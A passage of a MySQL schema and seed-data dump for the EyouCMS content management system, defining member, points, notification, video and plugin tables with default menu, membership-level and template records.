`union_id` varchar(50) NOT NULL DEFAULT '' COMMENT '微信用户的unionId',
PRIMARY KEY (`users_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='会员信息表';
-- -----------------------------
-- Table structure for `ey_users_bottom_menu`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_bottom_menu`;
CREATE TABLE `ey_users_bottom_menu` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`title` varchar(30) DEFAULT '' COMMENT '导航名称',
`mca` varchar(50) DEFAULT '' COMMENT '分组/控制器/操作名',
`icon` varchar(255) NOT NULL DEFAULT '' COMMENT '图标',
`sort_order` int(10) DEFAULT '100' COMMENT '排序号',
`status` tinyint(1) DEFAULT '1' COMMENT '功能开关状态,1=开启,0=关闭',
`display` tinyint(1) unsigned NOT NULL DEFAULT '1' COMMENT '是否显示, 1--是, 0--否',
`lang` varchar(20) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='会员中心移动端底部菜单表';
-- -----------------------------
-- Records of `ey_users_bottom_menu`
-- -----------------------------
INSERT INTO `ey_users_bottom_menu` VALUES ('1', '首页', 'home/Index/index', 'shouye', '100', '1', '1', 'cn', '1613986047', '1613986047');
INSERT INTO `ey_users_bottom_menu` VALUES ('2', '下载', 'user/Download/index', 'xiazai', '100', '1', '1', 'cn', '1613986047', '1613986047');
INSERT INTO `ey_users_bottom_menu` VALUES ('3', '发布', 'user/UsersRelease/article_add', 'fabu', '100', '1', '1', 'cn', '1613986047', '1613986047');
INSERT INTO `ey_users_bottom_menu` VALUES ('4', '我的', 'user/Users/centre', 'geren', '100', '1', '1', 'cn', '1613986047', '1613986047');
-- -----------------------------
-- Table structure for `ey_users_collection`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_collection`;
CREATE TABLE `ey_users_collection` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(10) DEFAULT '0',
`aid` int(10) DEFAULT '0' COMMENT '文档id',
`channel` int(10) DEFAULT '0' COMMENT '模型',
`typeid` int(10) DEFAULT '0' COMMENT '栏目',
`title` varchar(200) DEFAULT '' COMMENT '网站标题',
`litpic` varchar(255) DEFAULT '' COMMENT '缩略图',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='我的收藏';
-- -----------------------------
-- Table structure for `ey_users_config`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_config`;
CREATE TABLE `ey_users_config` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '会员功能配置表ID',
`name` varchar(50) DEFAULT '' COMMENT '配置的key键名',
`value` text COMMENT '配置的value值',
`desc` varchar(100) DEFAULT '' COMMENT '键名说明',
`inc_type` varchar(64) DEFAULT '' COMMENT '配置分组',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=utf8 COMMENT='会员功能配置表';
-- -----------------------------
-- Records of `ey_users_config`
-- -----------------------------
INSERT INTO `ey_users_config` VALUES ('1', 'users_reg_notallow', 'www,bbs,ftp,mail,user,users,admin,administrator,eyoucms', '不允许注册的会员名', 'users', 'cn', '1547890773');
INSERT INTO `ey_users_config` VALUES ('2', 'score_signin_status', '1', '', 'score', 'cn', '1613986047');
INSERT INTO `ey_users_config` VALUES ('3', 'score_signin_score', '3', '', 'score', 'cn', '1613986047');
INSERT INTO `ey_users_config` VALUES ('4', 'shop_open', '0', '', 'shop', 'cn', '1651715358');
INSERT INTO `ey_users_config` VALUES ('5', 'pay_balance_open', '1', '', 'pay', 'cn', '1668569108');
INSERT INTO `ey_users_config` VALUES ('6', 'users_login_expiretime', '3600', '', 'users', 'cn', '1668569109');
INSERT INTO `ey_users_config` VALUES ('7', 'score_name', '积分', '', 'score', 'cn', '1686213562');
INSERT INTO `ey_users_config` VALUES ('8', 'score_intro', 'a) 积分不可兑现、不可转让,仅可在本平台使用;\r\nb) 您在本平台参加特定活动也可使用积分,详细使用规则以具体活动时的规则为准;\r\nc) 积分的数值精确到个位(小数点后全部舍弃,不进行四舍五入)\r\nd) 买家在完成该笔交易(订单状态为“已签收”)后才能得到此笔交易的相应积分,如购买商品参加店铺其他优惠,则优惠的金额部分不享受积分获取;', '', 'score', 'cn', '1686213562');
INSERT INTO `ey_users_config` VALUES ('9', 'memgift_open', '0', '', 'memgift', 'cn', '1686213563');
INSERT INTO `ey_users_config` VALUES ('10', 'order_right_protect_time', '7', '', 'order', 'cn', '1686213588');
-- -----------------------------
-- Table structure for `ey_users_footprint`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_footprint`;
CREATE TABLE `ey_users_footprint` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`channel` int(10) DEFAULT '0' COMMENT '频道模型',
`typeid` int(10) DEFAULT '0' COMMENT '栏目id',
`aid` int(10) DEFAULT '0' COMMENT '文档id',
`title` varchar(100) DEFAULT '' COMMENT '网站标题',
`litpic` varchar(255) DEFAULT '' COMMENT '缩略图',
`users_id` int(10) DEFAULT '0',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE,
KEY `users_id` (`users_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='我的足迹';
-- -----------------------------
-- Table structure for `ey_users_forward`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_forward`;
CREATE TABLE `ey_users_forward` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(10) DEFAULT '0',
`aid` int(10) DEFAULT '0' COMMENT '文档id',
`channel` int(10) DEFAULT '0' COMMENT '模型',
`typeid` int(10) DEFAULT '0' COMMENT '栏目',
`title` varchar(200) DEFAULT '' COMMENT '网站标题',
`litpic` varchar(255) DEFAULT '' COMMENT '缩略图',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='转发记录';
-- -----------------------------
-- Table structure for `ey_users_level`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_level`;
CREATE TABLE `ey_users_level` (
`level_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`level_name` varchar(30) DEFAULT '' COMMENT '级别名称',
`level_value` int(10) DEFAULT '0' COMMENT '会员等级值',
`is_system` tinyint(1) DEFAULT '0' COMMENT '类型,1=系统,0=用户',
`amount` decimal(10,2) DEFAULT '0.00' COMMENT '消费额度',
`down_count` int(10) DEFAULT '0' COMMENT '每天下载次数限制',
`discount` float(10,2) DEFAULT '100.00' COMMENT '折扣率,初始值为100即100%,无折扣',
`posts_count` int(10) DEFAULT '5' COMMENT '会员投稿次数限制',
`ask_is_release` tinyint(1) DEFAULT '1' COMMENT '允许在问答中发布问题,1=是,0=否',
`ask_is_review` tinyint(1) DEFAULT '0' COMMENT '在问答中发布问题或回答是否需要审核,1=是,0=否',
`lang` varchar(20) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`level_id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8 COMMENT='会员级别表';
-- -----------------------------
-- Records of `ey_users_level`
-- -----------------------------
INSERT INTO `ey_users_level` VALUES ('1', '注册会员', '10', '1', '0.00', '100', '100', '5', '1', '0', 'cn', '0', '1551151513');
INSERT INTO `ey_users_level` VALUES ('2', '中级会员', '50', '0', '0.00', '100', '100', '10', '1', '0', 'cn', '1613985993', '1613985993');
INSERT INTO `ey_users_level` VALUES ('3', '高级会员', '100', '0', '0.00', '100', '100', '20', '1', '0', 'cn', '1613985993', '1613985993');
-- -----------------------------
-- Table structure for `ey_users_like`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_like`;
CREATE TABLE `ey_users_like` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(10) DEFAULT '0',
`aid` int(10) DEFAULT '0' COMMENT '文档id',
`channel` int(10) DEFAULT '0' COMMENT '模型',
`typeid` int(10) DEFAULT '0' COMMENT '栏目',
`title` varchar(200) DEFAULT '' COMMENT '网站标题',
`litpic` varchar(255) DEFAULT '' COMMENT '缩略图',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='我喜欢的';
-- -----------------------------
-- Table structure for `ey_users_list`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_list`;
CREATE TABLE `ey_users_list` (
`list_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`users_id` int(10) NOT NULL DEFAULT '0' COMMENT '会员ID',
`para_id` int(10) NOT NULL DEFAULT '0' COMMENT '属性ID',
`info` text COMMENT '属性值',
`lang` varchar(50) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`list_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='会员属性表(信息)';
-- -----------------------------
-- Table structure for `ey_users_login_log`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_login_log`;
CREATE TABLE `ey_users_login_log` (
`log_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '会员日志自增ID',
`users_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`log_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '日志时间,年月日(例:20230406)',
`log_count` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '日志次数',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '创建时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`log_id`),
UNIQUE KEY `users_id` (`users_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='会员登录日志 - 用于登录赠送积分';
-- -----------------------------
-- Table structure for `ey_users_menu`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_menu`;
CREATE TABLE `ey_users_menu` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`title` varchar(30) DEFAULT '' COMMENT '导航名称',
`version` varchar(10) DEFAULT 'weapp' COMMENT '分组',
`mca` varchar(50) DEFAULT '' COMMENT '分组/控制器/操作名',
`active_url` varchar(500) DEFAULT '' COMMENT '标记为选中的url',
`is_userpage` tinyint(1) DEFAULT '0' COMMENT '默认会员首页',
`sort_order` int(10) DEFAULT '0' COMMENT '排序号',
`status` tinyint(1) DEFAULT '1' COMMENT '状态,1=显示,0=隐藏',
`lang` varchar(20) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8 COMMENT='会员菜单表';
-- -----------------------------
-- Records of `ey_users_menu`
-- -----------------------------
INSERT INTO `ey_users_menu` VALUES ('1', '个人信息', 'v1', 'user/Users/index', '', '1', '100', '1', 'cn', '1555904190', '1555917737');
INSERT INTO `ey_users_menu` VALUES ('2', '账户充值', 'v1', 'user/Pay/pay_consumer_details', '', '0', '100', '1', 'cn', '1555904190', '1555917761');
INSERT INTO `ey_users_menu` VALUES ('3', '商城中心', 'v1', 'user/Shop/shop_centre', '', '0', '100', '0', 'cn', '1555904190', '1555917761');
INSERT INTO `ey_users_menu` VALUES ('4', '会员升级', 'v1', 'user/Level/level_centre', '', '0', '100', '0', 'cn', '1555904190', '1555917761');
INSERT INTO `ey_users_menu` VALUES ('5', '会员投稿', 'v1', 'user/UsersRelease/release_centre', '', '0', '100', '0', 'cn', '1555904190', '1555917761');
INSERT INTO `ey_users_menu` VALUES ('6', '我的下载', 'v1', 'user/Download/index', '', '0', '100', '0', 'cn', '1590484667', '1613986047');
INSERT INTO `ey_users_menu` VALUES ('7', '个人中心', 'v2', 'user/Users/index', 'user/Users/index|user/Pay/pay_account_recharge|user/Users/footprint_index|user/Level/level_centre|user/Download/index|user/Users/media_index', '1', '100', '1', 'cn', '1608708057', '1609385363');
INSERT INTO `ey_users_menu` VALUES ('8', '我的信息', 'v2', 'user/Users/info', 'user/Users/info', '0', '100', '1', 'cn', '1608709100', '1609385363');
INSERT INTO `ey_users_menu` VALUES ('9', '我的收藏', 'v2', 'user/Users/collection_index', 'user/Users/collection_index', '0', '100', '1', 'cn', '1608708100', '1609385363');
INSERT INTO `ey_users_menu` VALUES ('10', '财务明细', 'v2', 'user/Pay/pay_consumer_details', 'user/Pay/pay_consumer_details|user/Users/score_index', '0', '100', '1', 'cn', '1608709000', '1609387813');
INSERT INTO `ey_users_menu` VALUES ('11', '我的收藏', 'v1', 'user/Users/collection_index', '', '0', '100', '1', 'cn', '1590484667', '1614651537');
-- -----------------------------
-- Table structure for `ey_users_money`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_money`;
CREATE TABLE `ey_users_money` (
`moneyid` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '金额明细表ID',
`users_id` int(10) DEFAULT '0' COMMENT '会员表ID',
`money` decimal(10,2) DEFAULT '0.00' COMMENT '金额',
`users_money` decimal(10,2) DEFAULT '0.00' COMMENT '此条记录的账户金额',
`cause` text COMMENT '事由,暂时在升级消费中使用到,以serialize序列化后存入,用于后续查询。',
`cause_type` tinyint(1) DEFAULT '0' COMMENT '数据类型,0-消费,1-充值,2-退款,3-订单支付,4-管理员添加,5-管理员减少',
`status` tinyint(1) DEFAULT '1' COMMENT '是否成功,默认1,0失败,1未付款,2已付款,3已完成,4订单取消。',
`pay_method` varchar(50) DEFAULT '' COMMENT '支付方式,wechat为微信支付,alipay为支付宝支付,balance为余额支付',
`wechat_pay_type` varchar(20) NOT NULL DEFAULT '' COMMENT '微信支付时,标记使用的支付类型(扫码支付,微信内部,微信H5页面)',
`pay_details` text COMMENT '支付时返回的数据,以serialize序列化后存入,用于后续查询。',
`order_number` varchar(30) DEFAULT '' COMMENT '订单号',
`level_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '会员升级时所升级的会员级别ID,默认0',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`admin_id` int(10) DEFAULT '0' COMMENT '管理员表ID',
PRIMARY KEY (`moneyid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='金额明细表';
-- -----------------------------
-- Table structure for `ey_users_notice`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_notice`;
CREATE TABLE `ey_users_notice` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(50) DEFAULT '' COMMENT '通知标题',
`users_id` text NOT NULL COMMENT '用户id',
`usernames` text NOT NULL COMMENT '用户名字符串',
`remark` text COMMENT '通知信息',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='站内通知';
-- -----------------------------
-- Table structure for `ey_users_notice_read`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_notice_read`;
CREATE TABLE `ey_users_notice_read` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '用户id',
`notice_id` int(10) DEFAULT NULL COMMENT '站内信id',
`is_read` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否已读, 1---是, 0---否',
`is_del` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否删除, 1---是, 0---否',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='用户已读站内通知';
-- -----------------------------
-- Table structure for `ey_users_notice_tpl`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_notice_tpl`;
CREATE TABLE `ey_users_notice_tpl` (
`tpl_id` int(10) NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`tpl_name` varchar(200) DEFAULT '' COMMENT '模板名称',
`tpl_title` varchar(200) DEFAULT '' COMMENT '站内信标题',
`tpl_content` text COMMENT '发送内容',
`send_scene` tinyint(1) DEFAULT '0' COMMENT '站内信发送场景(1=留言表单)',
`is_open` tinyint(1) DEFAULT '0' COMMENT '是否开启使用这个模板,1为是,0为否。',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '添加时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`tpl_id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8 COMMENT='站内信模板表';
-- -----------------------------
-- Records of `ey_users_notice_tpl`
-- -----------------------------
INSERT INTO `ey_users_notice_tpl` VALUES ('1', '留言表单', '您有新的留言消息,请到内容管理中查看!', '${content}', '1', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_users_notice_tpl` VALUES ('5', '订单付款', '您有新的待发货订单消息,请到商城订单查看!', '${content}', '5', '1', 'cn', '1668569108', '1668569108');
INSERT INTO `ey_users_notice_tpl` VALUES ('6', '订单发货', '您有新的待收货订单消息,请到会员订单查看!', '${content}', '6', '1', 'cn', '1668569108', '1668569108');
-- -----------------------------
-- Table structure for `ey_users_notice_tpl_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_notice_tpl_content`;
CREATE TABLE `ey_users_notice_tpl_content` (
`content_id` int(10) NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`source` tinyint(1) DEFAULT '0' COMMENT '来源,对应 users_notice_tpl 表 send_scene 字段',
`admin_id` int(10) DEFAULT '0' COMMENT '管理员ID,不为空则表示管理员接收信息',
`users_id` int(10) DEFAULT '0' COMMENT '用户ID,不为空则表示会员接收信息,暂未使用',
`content_title` varchar(200) DEFAULT '' COMMENT '通知标题',
`content` text COMMENT '接收的通知内容',
`is_read` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '是否已读,默认0,1是,0否',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`content_id`),
KEY `admin_id` (`admin_id`) USING BTREE,
KEY `users_id` (`users_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='站内信发送接收记录表';
-- -----------------------------
-- Table structure for `ey_users_parameter`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_parameter`;
CREATE TABLE `ey_users_parameter` (
`para_id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'id',
`title` varchar(100) NOT NULL DEFAULT '' COMMENT '标题',
`name` varchar(100) NOT NULL DEFAULT '' COMMENT '名称',
`dtype` varchar(32) NOT NULL DEFAULT '' COMMENT '字段类型',
`dfvalue` varchar(1000) NOT NULL DEFAULT '' COMMENT '默认值',
`is_system` tinyint(1) DEFAULT '0' COMMENT '是否为系统属性,系统属性不可删除,1为是,0为否,默认0。',
`is_hidden` tinyint(1) DEFAULT '0' COMMENT '是否禁用属性,1为是,0为否',
`is_required` tinyint(1) DEFAULT '0' COMMENT '是否为必填属性,1为是,0为否,默认0。',
`is_reg` tinyint(1) DEFAULT '1' COMMENT '是否为注册表单,1为是,0为否',
`placeholder` varchar(255) DEFAULT '' COMMENT '提示文字',
`sort_order` smallint(5) NOT NULL DEFAULT '0' COMMENT '排序',
`lang` varchar(50) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`para_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='会员属性表(字段)';
-- -----------------------------
-- Records of `ey_users_parameter`
-- -----------------------------
INSERT INTO `ey_users_parameter` VALUES ('1', '手机号码', 'mobile_1', 'mobile', '', '1', '0', '0', '1', '', '1', 'cn', '0', '1613986047');
INSERT INTO `ey_users_parameter` VALUES ('2', '邮箱地址', 'email_2', 'email', '', '1', '0', '1', '1', '', '1', 'cn', '0', '1613986047');
-- -----------------------------
-- Table structure for `ey_users_score`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_score`;
CREATE TABLE `ey_users_score` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT '积分明细表',
`type` tinyint(2) DEFAULT '1' COMMENT '类型:1-提问,2-回答,3-最佳答案4-悬赏退回,5-每日签到,6-管理员编辑,7-问题悬赏/获得悬赏,8-消费赠送积分,9-积分兑换/退回,10-登录赠送积分',
`users_id` int(10) DEFAULT '0' COMMENT '用户id',
`ask_id` int(10) DEFAULT '0' COMMENT '问题id',
`reply_id` int(10) DEFAULT '0' COMMENT '回答id',
`score` varchar(20) NOT NULL DEFAULT '' COMMENT '积分',
`devote` int(10) DEFAULT '0' COMMENT '贡献值,同score',
`money` decimal(8,2) NOT NULL DEFAULT '0.00' COMMENT '余额',
`info` varchar(255) DEFAULT '' COMMENT '说明',
`lang` varchar(50) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(10) DEFAULT '0' COMMENT '创建时间',
`update_time` int(10) DEFAULT '0' COMMENT '更新时间',
`current_score` int(10) DEFAULT '0' COMMENT '当前积分',
`current_devote` int(10) DEFAULT '0' COMMENT '当前贡献值',
`admin_id` int(10) DEFAULT '0' COMMENT '管理员表ID',
`remark` varchar(255) DEFAULT '' COMMENT '备注',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='积分详情表';
-- -----------------------------
-- Table structure for `ey_users_signin`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_signin`;
CREATE TABLE `ey_users_signin` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '用户id',
`lang` varchar(50) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '签到时间',
PRIMARY KEY (`id`),
KEY `users_id` (`users_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='用户签到表';
-- -----------------------------
-- Table structure for `ey_users_type_manage`
-- -----------------------------
DROP TABLE IF EXISTS `ey_users_type_manage`;
CREATE TABLE `ey_users_type_manage` (
`type_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`type_name` varchar(30) DEFAULT '' COMMENT '类型名称',
`level_id` int(10) DEFAULT '0' COMMENT '会员等级ID',
`price` decimal(10,2) NOT NULL DEFAULT '0.00' COMMENT '价格',
`limit_id` int(10) DEFAULT '0' COMMENT '会员期限限制,存储ID,值对应常量表的admin_member_limit_arr数组',
`activity` varchar(30) DEFAULT '' COMMENT '活动文案',
`sort_order` smallint(5) NOT NULL DEFAULT '0' COMMENT '排序',
`lang` varchar(20) DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`type_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='会员产品类型表';
-- -----------------------------
-- Records of `ey_users_type_manage`
-- -----------------------------
INSERT INTO `ey_users_type_manage` VALUES ('1', '升级为本站中级会员', '2', '100.00', '2', '', '100', 'cn', '1613985993', '1613985993');
INSERT INTO `ey_users_type_manage` VALUES ('2', '升级为本站高级会员', '3', '200.00', '3', '', '100', 'cn', '1613985993', '1613985993');
-- -----------------------------
-- Table structure for `ey_verifier`
-- -----------------------------
DROP TABLE IF EXISTS `ey_verifier`;
CREATE TABLE `ey_verifier` (
`id` int(10) NOT NULL AUTO_INCREMENT COMMENT '核销员',
`users_id` int(10) DEFAULT '0' COMMENT '用户id',
`points_id` int(10) DEFAULT '0' COMMENT '所属提货点(pick_up_points表id)',
`name` varchar(55) DEFAULT '' COMMENT '核销员名称',
`mobile` varchar(55) DEFAULT '' COMMENT '手机号码',
`status` tinyint(1) DEFAULT '0' COMMENT '核销状态 开启 关闭\r\n核销状态 开启 关闭\r\n核销状态,0-开启 1-关闭',
`add_time` int(10) DEFAULT '0',
`update_time` int(10) DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='核销员表';
-- -----------------------------
-- Table structure for `ey_video_content`
-- -----------------------------
DROP TABLE IF EXISTS `ey_video_content`;
CREATE TABLE `ey_video_content` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`aid` int(10) DEFAULT '0' COMMENT '文档ID',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`vdsrc` varchar(200) NOT NULL DEFAULT '' COMMENT '视频地址',
PRIMARY KEY (`id`),
KEY `aid` (`aid`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='附加表';
-- -----------------------------
-- Records of `ey_video_content`
-- -----------------------------
INSERT INTO `ey_video_content` VALUES ('1', '13', '1552364595', '1552364595', 'http://player.youku.com/embed/XMzU1NzU5MzM4MA==');
INSERT INTO `ey_video_content` VALUES ('2', '14', '1552364689', '1552364689', 'http://player.youku.com/embed/XMzYyOTQ2MjA5Mg==');
INSERT INTO `ey_video_content` VALUES ('3', '52', '1552382177', '1552382177', 'http://player.youku.com/embed/XMzU1NzU5MzM4MA==');
INSERT INTO `ey_video_content` VALUES ('4', '53', '1552382208', '1552382208', 'http://player.youku.com/embed/XMzYyOTQ2MjA5Mg==');
-- -----------------------------
-- Table structure for `ey_weapp`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp`;
CREATE TABLE `ey_weapp` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`code` varchar(50) DEFAULT '' COMMENT '插件标识',
`name` varchar(55) DEFAULT '' COMMENT '中文名字',
`config` text COMMENT '配置信息',
`data` text COMMENT '额外序列化存储数据,简单插件可以不创建表,存储这里即可',
`status` tinyint(1) DEFAULT '0' COMMENT '状态:0=未安装,1=启用,-1=禁用',
`tag_weapp` tinyint(1) DEFAULT '1' COMMENT '1=自动绑定,2=手工调用。关联模板标签weapp,自动调用内置的show钩子方法',
`thorough` tinyint(1) DEFAULT '0' COMMENT '彻底卸载:0=是,1=否',
`position` varchar(30) DEFAULT 'default' COMMENT '插件位置',
`is_buy` tinyint(1) DEFAULT '0' COMMENT '0-本地,1-线上购买 2-线上购买,但已删除,不显示在我的插件列表',
`is_upgrade` tinyint(1) DEFAULT '1' COMMENT '是否提示升级',
`sort_order` int(10) DEFAULT '100' COMMENT '排序号',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
`quick_sort` int(10) DEFAULT '100' COMMENT '首页快捷菜单专用排序号',
`checked` tinyint(4) DEFAULT '0' COMMENT '选中,0=否,1=是(首页快捷菜单用)',
PRIMARY KEY (`id`),
KEY `code` (`code`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_ask`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_ask`;
CREATE TABLE `ey_weapp_ask` (
`ask_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`type_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题栏目ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '会员ID',
`ask_title` varchar(80) NOT NULL DEFAULT '' COMMENT '问题标题',
`is_recom` tinyint(1) NOT NULL DEFAULT '0' COMMENT '问题是否推荐',
`status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '问题状态:0未解决,1已解决,2已关闭',
`click` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '浏览点击量',
`replies` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题回复量',
`content` text NOT NULL COMMENT '问题内容',
`url` varchar(255) NOT NULL DEFAULT '' COMMENT '问题网址',
`users_ip` varchar(50) NOT NULL DEFAULT '' COMMENT '问题发布时IP地址',
